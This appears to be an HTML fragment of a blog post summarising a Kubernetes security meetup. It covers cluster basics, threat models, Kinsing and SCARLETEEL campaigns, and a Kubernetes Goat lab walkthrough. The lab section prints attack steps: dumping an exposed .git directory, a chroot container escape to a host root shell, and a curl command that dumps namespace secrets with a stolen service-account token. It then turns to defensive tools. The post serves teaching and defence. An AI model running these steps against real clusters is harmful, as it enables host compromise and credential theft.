href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#the-emergence-of-docker\" class=\"hash-link\" aria-label=\"Direct link to The Emergence of Docker\" title=\"Direct link to The Emergence of Docker\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">While container technologies existed in Linux (like LXC), they were complex to use and manage.</li>\n<li class=\"\"><strong>Docker</strong> came into place to democratize containerization. It provided a simple, user-friendly interface, a standardized image format, and robust tooling to easily build, ship, and run containers anywhere, which sparked the modern container revolution.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"docker-vs-kubernetes\">Docker vs Kubernetes<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#docker-vs-kubernetes\" class=\"hash-link\" aria-label=\"Direct link to Docker vs Kubernetes\" title=\"Direct link to Docker vs Kubernetes\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Docker</strong> is a platform used to <em>create, share, and run</em> individual containers.</li>\n<li class=\"\"><strong>Kubernetes</strong> is an orchestration system used to <em>manage, scale, and orchestrate</em> multiple containers across a cluster of machines.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"container-registry\">Container Registry<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#container-registry\" class=\"hash-link\" aria-label=\"Direct link to Container Registry\" title=\"Direct link to Container Registry\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">A centralized repository where container images are stored, managed, and distributed (e.g., <em>Docker Hub</em>, <em>Amazon ECR</em>, <em>Google Container Registry</em>).</li>\n<li class=\"\">Organizations often use a <strong>Private Registry</strong> to securely store their proprietary container images. A major advantage of container images is that when small changes are made to the application, only the modified layers need to be rebuilt and pushed to the registry. We can quickly reuse the rest of the image layers when spinning it up again, making deployments extremely fast and efficient.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"core-kubernetes-concepts\">Core Kubernetes Concepts<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#core-kubernetes-concepts\" class=\"hash-link\" aria-label=\"Direct link to Core Kubernetes Concepts\" title=\"Direct link to Core Kubernetes Concepts\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-are-pods\">What are Pods?<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#what-are-pods\" class=\"hash-link\" aria-label=\"Direct link to What are Pods?\" title=\"Direct link to What are Pods?\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">The <strong>smallest and simplest</strong> Kubernetes object. A Pod represents a single instance of a running process in your cluster and can contain one or more containers.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"other-key-resources\">Other Key Resources<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#other-key-resources\" class=\"hash-link\" aria-label=\"Direct link to Other Key Resources\" title=\"Direct link to Other Key Resources\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Namespace:</strong> Provides a mechanism for isolating groups of resources within a single cluster.</li>\n<li class=\"\"><strong>Replica Set:</strong> Ensures that a specified number of pod replicas are running at any given time.</li>\n<li class=\"\"><strong>Deployment:</strong> Provides declarative updates for Pods and ReplicaSets.</li>\n<li class=\"\"><strong>ConfigMap:</strong> Used to store non-confidential data in key-value pairs, keeping environment-specific configuration decoupled from image content.</li>\n<li class=\"\"><strong>Secret:</strong> Used to store sensitive information, such as passwords, OAuth tokens, and SSH keys. (Encoded, not encrypted, by default).</li>\n<li class=\"\"><strong>Volume:</strong> A directory containing data, accessible to the containers in a pod.</li>\n<li class=\"\"><strong>Persistent Volume (PV):</strong> A piece of storage in the cluster that has a lifecycle independent of any individual pod that uses it.</li>\n<li class=\"\"><strong>Persistent Volume Claim (PVC):</strong> A request for storage resources made by a user or application.</li>\n<li class=\"\"><strong>Ingress:</strong> An API object that manages external access to the services in a cluster, typically HTTP.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"structure-of-a-kubernetes-yaml-file\">Structure of a Kubernetes YAML File<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#structure-of-a-kubernetes-yaml-file\" class=\"hash-link\" aria-label=\"Direct link to Structure of a Kubernetes YAML File\" title=\"Direct link to Structure of a Kubernetes YAML File\" translate=\"no\">​</a></h3>\n<p>To deploy resources in Kubernetes, we use YAML manifests. Here is a breakdown of the key elements in a standard Deployment manifest:</p>\n<ul>\n<li class=\"\"><code>apiVersion</code>: Specifies the Kubernetes API version being used (e.g., <code>apps/v1</code>).</li>\n<li class=\"\"><code>kind</code>: Indicates the type of Kubernetes object being created (e.g., <code>Deployment</code>).</li>\n<li class=\"\"><code>metadata.name</code>: Specifies the name of the deployment resource.</li>\n<li class=\"\"><code>spec.replicas</code>: Defines the number of Pods to run at any time.</li>\n<li class=\"\"><code>spec.strategy.rollingUpdate.maxSurge</code>: The maximum number of Pods to be created on top of the desired count during deployment.</li>\n<li class=\"\"><code>spec.strategy.rollingUpdate.maxUnavailable</code>: The maximum number of Pods that can be unavailable during deployment.</li>\n<li class=\"\"><code>spec.selector.matchLabels</code> and <code>spec.template.metadata.labels</code>: Both labels should match to create a Pod.</li>\n<li class=\"\"><code>spec.template.metadata</code>: Defines the Pod manifest.</li>\n<li class=\"\"><code>spec.template.spec.containers.name</code>: The name of the container within the pod.</li>\n<li class=\"\"><code>spec.template.spec.containers.image</code>: The name of the container image to pull and run.</li>\n<li class=\"\"><code>spec.template.spec.containers.ports.containerPort</code>: The application listening/running port.</li>\n</ul>\n<div class=\"diagram-container\">\n  <figure>\n    <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/deployment-manifest-nginx-k8s.PNG\" alt=\"Example of a Kubernetes Deployment Manifest YAML structure\">\n    <figcaption class=\"diagram-caption\">\n      <strong>Fig 1:</strong> Example of a Kubernetes Deployment Manifest YAML structure\n    </figcaption>\n  </figure>\n</div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"kubernetes-components\">Kubernetes Components<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#kubernetes-components\" class=\"hash-link\" aria-label=\"Direct link to Kubernetes Components\" title=\"Direct link to Kubernetes Components\" translate=\"no\">​</a></h3>\n<p>A Kubernetes cluster consists of a set of worker machines, called nodes, that run containerized applications. Every cluster has at least one worker node.</p>\n<div class=\"diagram-container\">\n  <figure>\n    <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/Kubernetes-Architecture-Diagram.jpg\" alt=\"Kubernetes Cluster Architecture Diagram\">\n    <figcaption class=\"diagram-caption\">\n      <strong>Fig 2:</strong> Kubernetes Cluster Architecture Diagram\n    </figcaption>\n  </figure>\n</div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"control-plane-master-node\">Control Plane (Master Node)<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#control-plane-master-node\" class=\"hash-link\" aria-label=\"Direct link to Control Plane (Master Node)\" title=\"Direct link to Control Plane (Master Node)\" translate=\"no\">​</a></h4>\n<p>The Control Plane manages the worker nodes and the Pods in the cluster.</p>\n<ul>\n<li class=\"\"><strong>API Server:</strong> The central management entity that receives all REST requests and serves as the front end for the Kubernetes control plane.</li>\n<li class=\"\"><strong>etcd:</strong> A consistent and highly-available key-value store used as Kubernetes' backing store for all cluster data.</li>\n<li class=\"\"><strong>Scheduler:</strong> Watches for newly created Pods with no assigned node, and selects a node for them to run on.</li>\n<li class=\"\"><strong>Controller Manager:</strong> Think of the Controller Manager as a continuous <strong>state machine</strong>. It constantly monitors two states: the <em>Desired State</em> (which we provide via YAML manifests) and the <em>Current State</em> (the actual running state of the cluster). If the current state is not equivalent to the desired state, it takes action to bring it to the desired state. This is exactly how <strong>self-healing</strong> is achieved in Kubernetes.\n<blockquote>\n<p><strong>Integration Example:</strong> Security tools like <strong>Qualys VMDR</strong> can coordinate with the Controller Manager. When a vulnerability is found and patched, Qualys can trigger an update to the desired state, prompting the Controller Manager to gracefully roll out the patched containers while terminating the vulnerable ones, ensuring zero downtime patching.</p>\n</blockquote>\n</li>\n<li class=\"\"><strong>Cloud Controller Manager:</strong> Embeds cloud-specific control logic, linking the cluster into the cloud provider's API.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"data-plane-worker-nodes\">Data Plane (Worker Nodes)<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#data-plane-worker-nodes\" class=\"hash-link\" aria-label=\"Direct link to Data Plane (Worker Nodes)\" title=\"Direct link to Data Plane (Worker Nodes)\" translate=\"no\">​</a></h4>\n<p>The Data Plane contains the components that run on every node, maintaining running pods and providing the Kubernetes runtime environment.</p>\n<ul>\n<li class=\"\"><strong>kubelet:</strong> An agent that runs on each node in the cluster and ensures that containers are running in a Pod.</li>\n<li class=\"\"><strong>kube-proxy:</strong> A network proxy that runs on each node, maintaining network rules that allow network communication to Pods from inside or outside the cluster.</li>\n<li class=\"\"><strong>Container Runtime:</strong> The software that is responsible for running containers (e.g., Docker, containerd).</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"kubernetes-attack-surface--penetration-testing\">Kubernetes Attack Surface &amp; Penetration Testing<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#kubernetes-attack-surface--penetration-testing\" class=\"hash-link\" aria-label=\"Direct link to Kubernetes Attack Surface &amp; Penetration Testing\" title=\"Direct link to Kubernetes Attack Surface &amp; Penetration Testing\" translate=\"no\">​</a></h3>\n<p>During the session, an audience member asked which area generally presents the largest attack surface: the Infrastructure, the Application, or Kubernetes itself. The speaker responded that the <strong>Kubernetes side often presents a much larger and complex attack surface</strong> due to its numerous components, configurations, and internal networking.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"approaches-to-kubernetes-assessment\">Approaches to Kubernetes Assessment<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#approaches-to-kubernetes-assessment\" class=\"hash-link\" aria-label=\"Direct link to Approaches to Kubernetes Assessment\" title=\"Direct link to Approaches to Kubernetes Assessment\" translate=\"no\">​</a></h4>\n<p>The assessment of a Kubernetes environment mainly follows two approaches:</p>\n<ul>\n<li class=\"\"><strong>Black Box Penetration Testing:</strong> The penetration tester starts with no internal knowledge and <strong>no <code>kubeconfig</code> file</strong>. The goal is to determine how much damage an attacker can do purely from the outside (e.g., exploiting a vulnerable public-facing application to gain initial access to a pod, and then attempting to break out of the container or move laterally).</li>\n<li class=\"\"><strong>White/Grey Box Penetration Testing (With <code>kubeconfig</code>):</strong> The tester is provided with a <code>kubeconfig</code> file (often simulating a compromised developer's machine or insider threat). The goal here is to assess the impact and see how far privileges can be escalated within the cluster due to misconfigurations in <strong>RBAC (Role-Based Access Control)</strong> or weak policies.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"a-simple-threat-model\">A Simple Threat Model<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#a-simple-threat-model\" class=\"hash-link\" aria-label=\"Direct link to A Simple Threat Model\" title=\"Direct link to A Simple Threat Model\" translate=\"no\">​</a></h4>\n<p>When modeling threats for Kubernetes, consider the following:</p>\n<ul>\n<li class=\"\"><strong>Who are the attackers?</strong> External (from the internet), Internal (attacker in a pod), Developer (User with some access in the cluster), Malicious Administrator, or an End User.</li>\n<li class=\"\"><strong>What can they attack?</strong> Cluster state storage (<code>etcd</code>), Secrets, Volumes (Data Breach), Container Images (Private Repository), or Compute Resources (e.g., for Crypto Mining).</li>\n<li class=\"\"><strong>How can they attack?</strong> Configuration Weaknesses, exploiting vulnerabilities, exploiting trust across components, lack of appropriate AuthZ (Authorization) controls, or lack of security hardening.</li>\n</ul>\n<blockquote>\n<p><strong>Most Dangerous Finding in a K8s Pentest</strong>\nWhen someone from the audience asked the speaker what was his most dangerous finding during a K8s pentest, Abhishek shared that it was <mark><strong>Hardcoded Credentials</strong></mark>.</p>\n<p>By discovering hardcoded credentials, he was able to access the complete Kubernetes dashboard. Because there was absolutely no security hardening in place, he gained <strong>Admin access</strong>. From there, he changed the authorization configurations, changed user passwords to achieve complete cluster takeover, and effectively locked the client out of their own environment to demonstrate the severity of the misconfiguration.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"recent-kubernetes-attacks-threat-landscape\">Recent Kubernetes Attacks (Threat Landscape)<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#recent-kubernetes-attacks-threat-landscape\" class=\"hash-link\" aria-label=\"Direct link to Recent Kubernetes Attacks (Threat Landscape)\" title=\"Direct link to Recent Kubernetes Attacks (Threat Landscape)\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"1-kinsing-hacker-group-cryptojacking\">1. Kinsing Hacker Group (Cryptojacking)<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#1-kinsing-hacker-group-cryptojacking\" class=\"hash-link\" aria-label=\"Direct link to 1. Kinsing Hacker Group (Cryptojacking)\" title=\"Direct link to 1. Kinsing Hacker Group (Cryptojacking)\" translate=\"no\">​</a></h4>\n<p>The <strong>Kinsing</strong> hacker group has been actively exploiting various flaws to expand their botnet primarily for <strong>Cryptojacking</strong> (unauthorized use of compute resources to mine cryptocurrency).</p>\n<ul>\n<li class=\"\"><strong>Attack Flow:</strong> They start by exploiting a vulnerable workload (e.g., a vulnerable Openfire server, misconfigured Redis, or an open Docker API).</li>\n<li class=\"\"><strong>Execution:</strong> Once initial access is gained, they run memory-resident malware.</li>\n<li class=\"\"><strong>Persistence &amp; Impact:</strong> The malware establishes encrypted communication with their C2 (Command &amp; Control) server, downloads shell scripts, and runs a cryptominer hidden by a rootkit to evade detection.</li>\n<li class=\"\"><strong>Common Vulnerabilities Exploited:</strong> Misconfigured Remote Docker APIs (open to the internet without auth), Misconfigured Redis Servers, and various RCEs (Remote Code Execution) in WordPress, SaltStack, Apache Hadoop, etc.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"2-scarleteel-20-2024\">2. SCARLETEEL 2.0 (2024)<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#2-scarleteel-20-2024\" class=\"hash-link\" aria-label=\"Direct link to 2. SCARLETEEL 2.0 (2024)\" title=\"Direct link to 2. SCARLETEEL 2.0 (2024)\" translate=\"no\">​</a></h4>\n<p>A highly sophisticated attack campaign targeting AWS EC2 and other Kubernetes infrastructure. It perfectly demonstrates the critical risks of lateral movement.</p>\n<ul>\n<li class=\"\"><strong>Initial Access &amp; Execution:</strong> The attackers exploit a public-facing web application (e.g., a vulnerable Jupyter Notebook). The malicious scripts are aware of being in a Fargate-hosted container and actively collect credentials.</li>\n<li class=\"\"><strong>Information Gathering &amp; Escalation:</strong> They install tools like AWS CLI, <code>pacu</code>, and <code>peirates</code>. They attempt to exploit <strong>IMDSv2</strong> to retrieve tokens and subsequently AWS credentials.</li>\n<li class=\"\"><strong>Privilege Escalation &amp; Persistence:</strong> By escalating to Admin in the victim's AWS account, they spin up EC2 instances running miners. They use <code>peirates</code> to further exploit Kubernetes and frequently change C2 domains (utilizing public services) for defense evasion.</li>\n</ul>\n<blockquote>\n<p><strong>Container-to-Kubernetes Lateral Movement</strong></p>\n<p>SCARLETEEL 2.0 highlights the severe danger of <mark><strong>Container-to-Kubernetes Lateral Movement</strong></mark>, where a single container compromise can lead to a full Kubernetes account breach.</p>\n<p>When questioned about this lateral movement, the speaker clarified:</p>\n<ul>\n<li class=\"\">By default, Kubernetes is relatively secure due to modern <strong>RBAC (Role-Based Access Control)</strong> mechanisms.</li>\n<li class=\"\">However, if an attacker successfully escapes a container, they might gain access to the underlying platform (like minikube) and use command-line tools like <code>kubectl</code> to interact with the cluster.</li>\n<li class=\"\"><strong>The \"Complete Mess\" of Caveats:</strong> In reality, lateral movement can take many convoluted paths:\n<ul>\n<li class=\"\"><strong>Container to Container:</strong> Jumping to a container that has higher privileges or sensitive credentials mounted.</li>\n<li class=\"\"><strong>Container to Cluster:</strong> Gaining direct API access to the Kubernetes cluster from within the compromised pod.</li>\n<li class=\"\"><strong>Container to Runtime:</strong> Accessing the container runtime itself (e.g., containerd, docker, cri-o).</li>\n<li class=\"\"><strong>Container to Node (Host):</strong> In cases of misconfigured shared mounts, an attacker might achieve arbitrary file writes on the host file system. This allows them to break out to the underlying node and potentially steal highly privileged credentials.</li>\n</ul>\n</li>\n</ul>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"common-initial-attack-vectors-how-they-get-in\">Common Initial Attack Vectors (How They Get In)<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#common-initial-attack-vectors-how-they-get-in\" class=\"hash-link\" aria-label=\"Direct link to Common Initial Attack Vectors (How They Get In)\" title=\"Direct link to Common Initial Attack Vectors (How They Get In)\" translate=\"no\">​</a></h3>\n<p>According to the presentation, attackers typically gain their initial foothold through the following vectors:</p>\n<ul>\n<li class=\"\"><mark><strong>Misconfigurations (#1 Cause):</strong></mark> This includes exposing the Kubernetes API server to the internet, having overly permissive RBAC roles (especially <code>cluster-admin</code> bound to default service accounts), storing secrets in plaintext or environment variables, and running containers with <code>privileged: true</code> or as root.</li>\n<li class=\"\"><strong>Unpatched Software:</strong> Failing to update Kubernetes components (<code>kube-apiserver</code>, <code>kubelet</code>), container runtimes (like runc vulnerabilities e.g., <strong>CVE-2024-21626</strong>), or workloads.</li>\n<li class=\"\"><strong>Compromised Credentials:</strong> Stolen Kubernetes provider IAM keys, service account tokens, or developer CI/CD credentials.</li>\n<li class=\"\"><strong>Vulnerable Applications:</strong> Web applications running inside containers with common vulnerabilities (like SQLi or RCE) that provide an initial foothold.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"scrutiny-weaponized-for-silent-cryptojacking\">Scrutiny Weaponized for Silent Cryptojacking<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#scrutiny-weaponized-for-silent-cryptojacking\" class=\"hash-link\" aria-label=\"Direct link to Scrutiny Weaponized for Silent Cryptojacking\" title=\"Direct link to Scrutiny Weaponized for Silent Cryptojacking\" translate=\"no\">​</a></h3>\n<p>A growing trend in the threat landscape is the weaponization of legitimate security tools:</p>\n<ul>\n<li class=\"\">Attackers run legitimate open-source auditing tools like <strong>kubeaudit</strong> and <strong>kubescape</strong> inside compromised clusters to actively identify misconfigurations they can exploit. This allows them to deploy hidden, low-resource cryptojacking containers that evade typical monitoring.</li>\n<li class=\"\">Another vector involves attackers uploading malicious container images or Helm charts (embedded with cryptominers or credential stealers) to public repositories like Docker Hub. Developers who pull these images without proper vetting inadvertently compromise their entire clusters.</li>\n</ul>\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"hands-on-lab-kubernetes-goat-walkthrough\">Hands-On Lab: Kubernetes Goat Walkthrough<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#hands-on-lab-kubernetes-goat-walkthrough\" class=\"hash-link\" aria-label=\"Direct link to Hands-On Lab: Kubernetes Goat Walkthrough\" title=\"Direct link to Hands-On Lab: Kubernetes Goat Walkthrough\" translate=\"no\">​</a></h3>\n<p>Abhishek ensured the session was highly interactive by providing attendees with a pre-configured Ubuntu Virtual Machine (OVA file). This lab environment had everything completely set up for us—a huge shoutout and credit to the speaker for removing the friction of setting up a local cluster!</p>\n<p>The lab heavily featured <strong>Kubernetes Goat</strong>, an intentionally vulnerable cluster environment created by <strong>Madhu Akula</strong>, designed to help security professionals learn and practice Kubernetes security practically.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"setting-up-the-lab-environment\">Setting up the Lab Environment<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#setting-up-the-lab-environment\" class=\"hash-link\" aria-label=\"Direct link to Setting up the Lab Environment\" title=\"Direct link to Setting up the Lab Environment\" translate=\"no\">​</a></h4>\n<p>Getting the lab running inside the VM was straightforward:</p>\n<ol>\n<li class=\"\"><strong>Start the cluster:</strong> We simply ran <code>minikube start</code> to spin up our local Kubernetes control plane and worker nodes.\n<div class=\"diagram-container\">\n</div></li>\n</ol>\n  <figure>\n    <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/minikube-start.png\" alt=\"Starting the local minikube cluster inside the Ubuntu VM\">\n    <figcaption class=\"diagram-caption\">\n      <strong>Fig 3:</strong> Starting the local minikube cluster inside the Ubuntu VM\n    </figcaption>\n  </figure>\n\n<ol start=\"2\">\n<li class=\"\"><strong>Expose Kubernetes Goat:</strong> We navigated to the <code>kubernetes-goat</code> directory and ran the provided script: <code>bash access-kubernetes-goat.sh</code>. This automatically created the necessary port forwards (e.g., ports 1230 to 1236) and hosted the vulnerable application guide locally on <code>http://127.0.0.1:1234</code>.\n<div class=\"diagram-container\">\n</div></li>\n</ol>\n  <figure>\n    <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/kubegoat-deply.png\" alt=\"Setting up and exposing Kubernetes Goat locally\">\n    <figcaption class=\"diagram-caption\">\n      <strong>Fig 4:</strong> Setting up and exposing Kubernetes Goat locally\n    </figcaption>\n  </figure>\n\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"scenario-1-sensitive-keys-in-codebases\">Scenario 1: Sensitive Keys in Codebases<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#scenario-1-sensitive-keys-in-codebases\" class=\"hash-link\" aria-label=\"Direct link to Scenario 1: Sensitive Keys in Codebases\" title=\"Direct link to Scenario 1: Sensitive Keys in Codebases\" translate=\"no\">​</a></h4>\n<p>Abhishek kicked off the walkthrough with the first scenario: <em>Sensitive keys in codebases</em>.</p>\n<ul>\n<li class=\"\">In modern CI/CD and GitOps workflows, developers sometimes accidentally commit sensitive information to version control systems.</li>\n<li class=\"\">The vulnerability often stems from web servers misconfigured to serve the <code>.git</code> directory publicly. An attacker can navigate to <code>url.com/.git/config</code> to verify the exposure.</li>\n<li class=\"\">The attacker downloads the <code>.git</code> directory locally using <code>git-dumper</code>. From there, they can view the commit history, find previous commit hashes, and change the <code>HEAD</code> to an older commit. In the walkthrough demonstration, reverting to an older commit revealed a <code>.env</code> file that had been accidentally committed, ultimately exposing highly sensitive application credentials.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"scenario-2-container-escape-to-the-host-system\">Scenario 2: Container Escape to the Host System<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#scenario-2-container-escape-to-the-host-system\" class=\"hash-link\" aria-label=\"Direct link to Scenario 2: Container Escape to the Host System\" title=\"Direct link to Scenario 2: Container Escape to the Host System\" translate=\"no\">​</a></h4>\n<p>The second example demonstrated a critical vulnerability: breaking out of a container to gain access to the underlying host node.</p>\n<ul>\n<li class=\"\">Abhishek started by running <code>capsh --print</code> inside the compromised pod. This command prints the current capabilities of the container, including the Bounding set and Ambient set, which helps attackers understand what privileged actions they are allowed to perform.\n<div class=\"diagram-container\">\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/capsh-demo.png\" alt=\"Demonstration of using capsh to view container capabilities\">\n  <figcaption class=\"diagram-caption\">\n    <strong>Fig 5:</strong> Demonstration of using capsh to view container capabilities\n  </figcaption>\n</figure>\n</div></li>\n</ul>\n\n<ul>\n<li class=\"\">He then demonstrated that a misconfigured shared mount allowed him to see the host's filesystem by running <code>ls /host-system/</code>.</li>\n<li class=\"\">By executing <code>chroot /host-system bash</code>, the attacker effectively breaks out of the container's isolated filesystem and drops into a root shell on the underlying host node.</li>\n<li class=\"\">Once on the host, Abhishek ran <code>crictl pods</code>, successfully listing all pods running on that specific node, demonstrating a complete node compromise.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"scenario-3-rbac-least-privileges-misconfiguration\">Scenario 3: RBAC Least Privileges Misconfiguration<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#scenario-3-rbac-least-privileges-misconfiguration\" class=\"hash-link\" aria-label=\"Direct link to Scenario 3: RBAC Least Privileges Misconfiguration\" title=\"Direct link to Scenario 3: RBAC Least Privileges Misconfiguration\" translate=\"no\">​</a></h4>\n<p>The final scenario highlighted the dangers of overly permissive Role-Based Access Control (RBAC), a common issue addressed in Madhu Akula's blogs.</p>\n<ul>\n<li class=\"\">Developers and DevOps teams often assign extra privileges to service accounts to ensure things \"just work.\" In this scenario, a pod is only supposed to have access to a <code>webhookapikey</code>, but due to a misconfiguration, the attached service account has broader permissions.</li>\n<li class=\"\">From inside the pod, the attacker navigates to <code>/var/run/secrets/kubernetes.io/serviceaccount/</code> to find the mounted service account credentials (<code>ca.crt</code>, <code>namespace</code>, and <code>token</code>).</li>\n<li class=\"\">By exporting these values into environment variables (<code>TOKEN</code>, <code>CACERT</code>, <code>APISERVER</code>), the attacker uses <code>curl</code> to authenticate directly with the Kubernetes API Server.</li>\n<li class=\"\">Running a command like <code>curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\" -X GET ${APISERVER}/api/v1/secrets</code> successfully dumps all secrets in the namespace (including a highly sensitive <code>vaultapikey</code>). This perfectly illustrates how failing to implement the principle of least privilege can turn a minor pod compromise into a massive data breach.</li>\n</ul>\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"telemetry-dashboards-and-auditing-tools\">Telemetry, Dashboards, and Auditing Tools<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#telemetry-dashboards-and-auditing-tools\" class=\"hash-link\" aria-label=\"Direct link to Telemetry, Dashboards, and Auditing Tools\" title=\"Direct link to Telemetry, Dashboards, and Auditing Tools\" translate=\"no\">​</a></h3>\n<p>The latter half of the presentation shifted focus towards defense, monitoring, and automated auditing.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"defending-with-falco\">Defending with Falco<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#defending-with-falco\" class=\"hash-link\" aria-label=\"Direct link to Defending with Falco\" title=\"Direct link to Defending with Falco\" translate=\"no\">​</a></h4>\n<p>Abhishek emphasized the importance of runtime security monitoring. He showcased <strong>Falco</strong> as a vital tool for SOC teams.</p>\n<ul>\n<li class=\"\"><strong>Why Falco?</strong> It provides crucial telemetry, allowing security teams to detect anomalous behavior in real-time. If a penetration tester (or a malicious actor) manages to execute commands or manipulate files within a Kubernetes environment, Falco generates alerts based on those runtime events.</li>\n<li class=\"\">In the Kubernetes Goat lab, this was demonstrated via the <em>Falco - Runtime security monitoring &amp; detection</em> scenario, showing how easily it can be deployed using Helm charts.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-dangers-of-an-unsecured-kubernetes-dashboard\">The Dangers of an Unsecured Kubernetes Dashboard<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#the-dangers-of-an-unsecured-kubernetes-dashboard\" class=\"hash-link\" aria-label=\"Direct link to The Dangers of an Unsecured Kubernetes Dashboard\" title=\"Direct link to The Dangers of an Unsecured Kubernetes Dashboard\" translate=\"no\">​</a></h4>\n<p>After a short break, the session resumed with Abhishek deploying the official Kubernetes Dashboard using the <code>minikube dashboard</code> command.</p>\n<ul>\n<li class=\"\">He explicitly discussed the severe consequences of leaving this dashboard unsecured and exposed to the internet.</li>\n<li class=\"\"><strong>The Impact:</strong> An attacker gaining access to the dashboard can easily view the entire workload status (Deployments, Pods, Replica Sets). More critically, they can inspect YAML configurations, view namespace details, read pod logs, delete images, and even gain direct SSH/exec access into running containers straight from the browser interface.\n<div class=\"diagram-container\">\n<figure>\n  <img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://raw.githubusercontent.com/haxnation/blog/main/blog/param-jasani/breachforce-meetup/imgs/minikube-dashboard.png\" alt=\"Unsecured Kubernetes Dashboard overview interface\">\n  <figcaption class=\"diagram-caption\">\n    <strong>Fig 6:</strong> Unsecured Kubernetes Dashboard overview interface\n  </figcaption>\n</figure>\n</div></li>\n</ul>\n\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"automated-security-scanning-tools\">Automated Security Scanning Tools<a href=\"https://haxnation.github.io/blog/breachforce-mumbai-meetup-june26-summary#automated-security-scanning-tools\" class=\"hash-link\" aria-label=\"Direct link to Automated Security Scanning Tools\" title=\"Direct link to Automated Security Scanning Tools\" translate=\"no\">​</a></h4>\n<p>To wrap up the technical demonstrations, Abhishek ran through a battery of popular open-source auditing and scanning tools to show how defenders can proactively identify the vulnerabilities discussed throughout the meetup:</p>\n<ul>\n<li class=\"\"><strong>KICS (Keeping Infrastructure as Code 